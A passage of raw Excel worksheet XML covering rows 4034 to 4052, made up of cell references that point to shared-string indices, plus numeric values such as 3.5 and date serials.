        <v>21</v>
      </c>
      <c r="I4034" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4034" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4034" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4034" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4034" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4034" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4034" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4034" s="12" t="s">
        <v>25925</v>
      </c>
      <c r="Q4034" s="12">
        <v>3.5</v>
      </c>
      <c r="R4034" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4034" s="12" t="s">
        <v>25926</v>
      </c>
      <c r="T4034" s="12" t="s">
        <v>25927</v>
      </c>
      <c r="U4034" s="12" t="s">
        <v>25928</v>
      </c>
      <c r="V4034" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4034" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4034" s="12">
        <v>25</v>
      </c>
      <c r="Y4034" s="12" t="s">
        <v>25929</v>
      </c>
    </row>
    <row r="4035" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4035" s="12">
        <v>45231</v>
      </c>
      <c r="B4035" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4035" s="12" t="s">
        <v>31376</v>
      </c>
      <c r="F4035" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4035" s="12" t="s">
        <v>25930</v>
      </c>
      <c r="H4035" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4035" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4035" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4035" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4035" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4035" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4035" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4035" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q4035" s="12">
        <v>3.2</v>
      </c>
      <c r="R4035" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4035" s="12" t="s">
        <v>25931</v>
      </c>
      <c r="T4035" s="12" t="s">
        <v>25932</v>
      </c>
      <c r="U4035" s="12" t="s">
        <v>25933</v>
      </c>
      <c r="V4035" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4035" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4035" s="12">
        <v>14</v>
      </c>
      <c r="Y4035" s="12" t="s">
        <v>25934</v>
      </c>
    </row>
    <row r="4036" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4036" s="12">
        <v>45481</v>
      </c>
      <c r="B4036" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4036" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4036" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4036" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4036" s="12" t="s">
        <v>25935</v>
      </c>
      <c r="H4036" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4036" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4036" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4036" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4036" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4036" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4036" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4036" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4036" s="12" t="s">
        <v>25936</v>
      </c>
      <c r="Q4036" s="12">
        <v>3.5</v>
      </c>
      <c r="R4036" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4036" s="12" t="s">
        <v>25937</v>
      </c>
      <c r="T4036" s="12" t="s">
        <v>25938</v>
      </c>
      <c r="U4036" s="12" t="s">
        <v>25845</v>
      </c>
      <c r="V4036" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4036" s="12">
        <v>45491</v>
      </c>
      <c r="X4036" s="12">
        <v>5</v>
      </c>
      <c r="Y4036" s="12" t="s">
        <v>25939</v>
      </c>
    </row>
    <row r="4037" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4037" s="12">
        <v>45521</v>
      </c>
      <c r="B4037" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4037" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4037" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4037" s="12" t="s">
        <v>25940</v>
      </c>
      <c r="H4037" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4037" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4037" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4037" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4037" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4037" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4037" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4037" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4037" s="12" t="s">
        <v>25941</v>
      </c>
      <c r="Q4037" s="12">
        <v>3.6</v>
      </c>
      <c r="R4037" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4037" s="12" t="s">
        <v>25942</v>
      </c>
      <c r="T4037" s="12" t="s">
        <v>16353</v>
      </c>
      <c r="U4037" s="12" t="s">
        <v>20095</v>
      </c>
      <c r="V4037" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4037" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4037" s="12">
        <v>4</v>
      </c>
      <c r="Y4037" s="12" t="s">
        <v>25943</v>
      </c>
    </row>
    <row r="4038" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4038" s="12">
        <v>45921</v>
      </c>
      <c r="B4038" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4038" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4038" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4038" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4038" s="12" t="s">
        <v>25944</v>
      </c>
      <c r="H4038" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4038" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4038" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4038" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4038" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4038" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4038" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4038" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4038" s="12" t="s">
        <v>25945</v>
      </c>
      <c r="Q4038" s="12">
        <v>3.5</v>
      </c>
      <c r="R4038" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4038" s="12" t="s">
        <v>25946</v>
      </c>
      <c r="T4038" s="12" t="s">
        <v>4078</v>
      </c>
      <c r="U4038" s="12" t="s">
        <v>25947</v>
      </c>
      <c r="V4038" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4038" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4038" s="12">
        <v>10</v>
      </c>
      <c r="Y4038" s="12" t="s">
        <v>25948</v>
      </c>
    </row>
    <row r="4039" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4039" s="12">
        <v>46161</v>
      </c>
      <c r="B4039" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4039" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4039" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4039" s="12" t="s">
        <v>25949</v>
      </c>
      <c r="H4039" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4039" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4039" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4039" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4039" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4039" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4039" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4039" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4039" s="12">
        <v>3.6</v>
      </c>
      <c r="Q4039" s="12">
        <v>3.6</v>
      </c>
      <c r="R4039" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4039" s="12" t="s">
        <v>25950</v>
      </c>
      <c r="T4039" s="12" t="s">
        <v>25951</v>
      </c>
      <c r="U4039" s="12" t="s">
        <v>25952</v>
      </c>
      <c r="V4039" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4039" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4039" s="12">
        <v>6</v>
      </c>
      <c r="Y4039" s="12" t="s">
        <v>25953</v>
      </c>
    </row>
    <row r="4040" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4040" s="12">
        <v>46371</v>
      </c>
      <c r="B4040" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4040" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4040" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4040" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4040" s="12" t="s">
        <v>25954</v>
      </c>
      <c r="H4040" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4040" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4040" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K4040" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4040" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4040" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4040" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4040" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4040" s="12" t="s">
        <v>25955</v>
      </c>
      <c r="Q4040" s="12">
        <v>3.5</v>
      </c>
      <c r="R4040" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4040" s="12" t="s">
        <v>25956</v>
      </c>
      <c r="T4040" s="12" t="s">
        <v>25957</v>
      </c>
      <c r="U4040" s="12" t="s">
        <v>25958</v>
      </c>
      <c r="V4040" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W4040" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4040" s="12">
        <v>13</v>
      </c>
      <c r="Y4040" s="12" t="s">
        <v>25959</v>
      </c>
    </row>
    <row r="4041" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4041" s="12">
        <v>46401</v>
      </c>
      <c r="B4041" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4041" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4041" s="12" t="s">
        <v>30802</v>
      </c>
      <c r="F4041" s="12" t="s">
        <v>30802</v>
      </c>
      <c r="G4041" s="12" t="s">
        <v>25960</v>
      </c>
      <c r="H4041" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4041" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4041" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4041" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4041" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4041" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4041" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4041" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4041" s="12" t="s">
        <v>25961</v>
      </c>
      <c r="Q4041" s="12">
        <v>3.6</v>
      </c>
      <c r="R4041" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4041" s="12" t="s">
        <v>25962</v>
      </c>
      <c r="T4041" s="12" t="s">
        <v>25963</v>
      </c>
      <c r="U4041" s="12" t="s">
        <v>25964</v>
      </c>
      <c r="V4041" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4041" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4041" s="12">
        <v>18</v>
      </c>
      <c r="Y4041" s="12" t="s">
        <v>25965</v>
      </c>
    </row>
    <row r="4042" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4042" s="12">
        <v>46741</v>
      </c>
      <c r="B4042" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4042" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4042" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4042" s="12" t="s">
        <v>25966</v>
      </c>
      <c r="H4042" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4042" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4042" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4042" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4042" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4042" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4042" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4042" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4042" s="12" t="s">
        <v>25967</v>
      </c>
      <c r="Q4042" s="12" t="s">
        <v>28285</v>
      </c>
      <c r="R4042" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4042" s="12" t="s">
        <v>25968</v>
      </c>
      <c r="T4042" s="12" t="s">
        <v>17280</v>
      </c>
      <c r="U4042" s="12" t="s">
        <v>25969</v>
      </c>
      <c r="V4042" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4042" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4042" s="12">
        <v>50</v>
      </c>
      <c r="Y4042" s="12" t="s">
        <v>25970</v>
      </c>
    </row>
    <row r="4043" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4043" s="12">
        <v>46801</v>
      </c>
      <c r="B4043" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D4043" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4043" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4043" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4043" s="12" t="s">
        <v>25971</v>
      </c>
      <c r="H4043" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4043" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4043" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4043" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4043" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4043" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4043" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4043" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4043" s="12" t="s">
        <v>25972</v>
      </c>
      <c r="Q4043" s="12">
        <v>3.4</v>
      </c>
      <c r="R4043" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4043" s="12" t="s">
        <v>25973</v>
      </c>
      <c r="T4043" s="12" t="s">
        <v>25644</v>
      </c>
      <c r="U4043" s="12" t="s">
        <v>25974</v>
      </c>
      <c r="V4043" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4043" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4043" s="12">
        <v>10</v>
      </c>
      <c r="Y4043" s="12" t="s">
        <v>25975</v>
      </c>
    </row>
    <row r="4044" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4044" s="12">
        <v>46831</v>
      </c>
      <c r="B4044" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4044" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D4044" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4044" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4044" s="12" t="s">
        <v>25976</v>
      </c>
      <c r="H4044" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4044" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4044" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K4044" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4044" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4044" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4044" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4044" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4044" s="12" t="s">
        <v>25977</v>
      </c>
      <c r="Q4044" s="12">
        <v>3.6</v>
      </c>
      <c r="R4044" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4044" s="12" t="s">
        <v>25978</v>
      </c>
      <c r="T4044" s="12" t="s">
        <v>25979</v>
      </c>
      <c r="U4044" s="12" t="s">
        <v>25980</v>
      </c>
      <c r="V4044" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4044" s="12">
        <v>50681</v>
      </c>
      <c r="X4044" s="12">
        <v>20</v>
      </c>
      <c r="Y4044" s="12" t="s">
        <v>25981</v>
      </c>
    </row>
    <row r="4045" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4045" s="12">
        <v>46971</v>
      </c>
      <c r="B4045" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4045" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4045" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4045" s="12" t="s">
        <v>25991</v>
      </c>
      <c r="H4045" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4045" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4045" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K4045" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4045" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4045" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4045" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4045" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4045" s="12" t="s">
        <v>25955</v>
      </c>
      <c r="Q4045" s="12">
        <v>3.5</v>
      </c>
      <c r="R4045" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4045" s="12" t="s">
        <v>25992</v>
      </c>
      <c r="T4045" s="12" t="s">
        <v>22329</v>
      </c>
      <c r="U4045" s="12" t="s">
        <v>25993</v>
      </c>
      <c r="V4045" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W4045" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4045" s="12">
        <v>3</v>
      </c>
      <c r="Y4045" s="12" t="s">
        <v>25994</v>
      </c>
    </row>
    <row r="4046" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4046" s="12">
        <v>47301</v>
      </c>
      <c r="B4046" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4046" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4046" s="12" t="s">
        <v>31491</v>
      </c>
      <c r="F4046" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4046" s="12" t="s">
        <v>25995</v>
      </c>
      <c r="H4046" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4046" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J4046" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K4046" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4046" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4046" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4046" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4046" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4046" s="12" t="s">
        <v>25941</v>
      </c>
      <c r="Q4046" s="12">
        <v>3.6</v>
      </c>
      <c r="R4046" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4046" s="12" t="s">
        <v>25996</v>
      </c>
      <c r="T4046" s="12" t="s">
        <v>8568</v>
      </c>
      <c r="U4046" s="12" t="s">
        <v>25997</v>
      </c>
      <c r="V4046" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W4046" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4046" s="12">
        <v>31</v>
      </c>
      <c r="Y4046" s="12" t="s">
        <v>25998</v>
      </c>
    </row>
    <row r="4047" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4047" s="12">
        <v>47341</v>
      </c>
      <c r="B4047" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4047" s="12" t="s">
        <v>30444</v>
      </c>
      <c r="F4047" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4047" s="12" t="s">
        <v>25999</v>
      </c>
      <c r="H4047" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4047" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J4047" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4047" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4047" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4047" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4047" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4047" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4047" s="12" t="s">
        <v>26000</v>
      </c>
      <c r="Q4047" s="12">
        <v>3</v>
      </c>
      <c r="R4047" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4047" s="12" t="s">
        <v>26001</v>
      </c>
      <c r="T4047" s="12" t="s">
        <v>26002</v>
      </c>
      <c r="U4047" s="12" t="s">
        <v>26003</v>
      </c>
      <c r="V4047" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W4047" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4047" s="12">
        <v>2</v>
      </c>
      <c r="Y4047" s="12" t="s">
        <v>26004</v>
      </c>
    </row>
    <row r="4048" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4048" s="12">
        <v>47681</v>
      </c>
      <c r="B4048" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4048" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4048" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4048" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4048" s="12" t="s">
        <v>26005</v>
      </c>
      <c r="H4048" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4048" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4048" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4048" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4048" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4048" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4048" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4048" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4048" s="12" t="s">
        <v>26006</v>
      </c>
      <c r="Q4048" s="12">
        <v>3.6</v>
      </c>
      <c r="R4048" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4048" s="12" t="s">
        <v>26007</v>
      </c>
      <c r="T4048" s="12" t="s">
        <v>8287</v>
      </c>
      <c r="U4048" s="12" t="s">
        <v>26008</v>
      </c>
      <c r="V4048" s="12" t="s">
        <v>6182</v>
      </c>
      <c r="W4048" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4048" s="12">
        <v>2</v>
      </c>
      <c r="Y4048" s="12" t="s">
        <v>26009</v>
      </c>
    </row>
    <row r="4049" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4049" s="12">
        <v>47861</v>
      </c>
      <c r="B4049" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4049" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4049" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4049" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4049" s="12" t="s">
        <v>26010</v>
      </c>
      <c r="H4049" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4049" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4049" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4049" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4049" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4049" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4049" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4049" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4049" s="12" t="s">
        <v>26011</v>
      </c>
      <c r="Q4049" s="12">
        <v>3.4</v>
      </c>
      <c r="R4049" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4049" s="12" t="s">
        <v>26012</v>
      </c>
      <c r="T4049" s="12" t="s">
        <v>26013</v>
      </c>
      <c r="U4049" s="12" t="s">
        <v>26014</v>
      </c>
      <c r="V4049" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W4049" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4049" s="12">
        <v>18</v>
      </c>
      <c r="Y4049" s="12" t="s">
        <v>26015</v>
      </c>
    </row>
    <row r="4050" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4050" s="12">
        <v>48041</v>
      </c>
      <c r="B4050" s="12" t="s">
        <v>31055</v>
      </c>
      <c r="D4050" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4050" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4050" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4050" s="12" t="s">
        <v>26016</v>
      </c>
      <c r="H4050" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4050" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4050" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4050" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4050" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4050" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4050" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4050" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4050" s="12" t="s">
        <v>26017</v>
      </c>
      <c r="Q4050" s="12">
        <v>3.5</v>
      </c>
      <c r="R4050" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4050" s="12" t="s">
        <v>26018</v>
      </c>
      <c r="T4050" s="12" t="s">
        <v>2622</v>
      </c>
      <c r="U4050" s="12" t="s">
        <v>26019</v>
      </c>
      <c r="V4050" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W4050" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4050" s="12">
        <v>10</v>
      </c>
      <c r="Y4050" s="12" t="s">
        <v>26020</v>
      </c>
    </row>
    <row r="4051" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4051" s="12">
        <v>48131</v>
      </c>
      <c r="B4051" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4051" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4051" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4051" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4051" s="12" t="s">
        <v>26021</v>
      </c>
      <c r="H4051" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4051" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4051" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4051" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4051" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4051" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4051" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4051" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4051" s="12">
        <v>3.5</v>
      </c>
      <c r="Q4051" s="12">
        <v>3.5</v>
      </c>
      <c r="R4051" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4051" s="12" t="s">
        <v>26022</v>
      </c>
      <c r="T4051" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="U4051" s="12" t="s">
        <v>26023</v>
      </c>
      <c r="V4051" s="12" t="s">
        <v>26024</v>
      </c>
      <c r="W4051" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4051" s="12">
        <v>12</v>
      </c>
      <c r="Y4051" s="12" t="s">
        <v>26025</v>
      </c>
    </row>
    <row r="4052" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4052" s="12">
        <v>48201</v>
      </c>
      <c r="B4052" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4052" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4052" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4052" s="12" t="s">
        <v>30763</v>
      </c>
      <c r="G4052" s="12" t="s">
        <v>26026</v>
      </c>
      <c r="H4052" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4052" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4052" s="12" t="s">
        <v>26027</v>
      </c>
      <c r="K4052" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4052" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4052" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4052" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4052" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4052" s="12" t="s">
        <v>26028</v>
      </c>
      <c r="Q4052" s="12">
        <v>3.6</v>
      </c>
      <c r="R4052" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4052" s="12" t="s">
        <v>26029</v>
      </c>
      <c r="T4052" s="12" t="s">
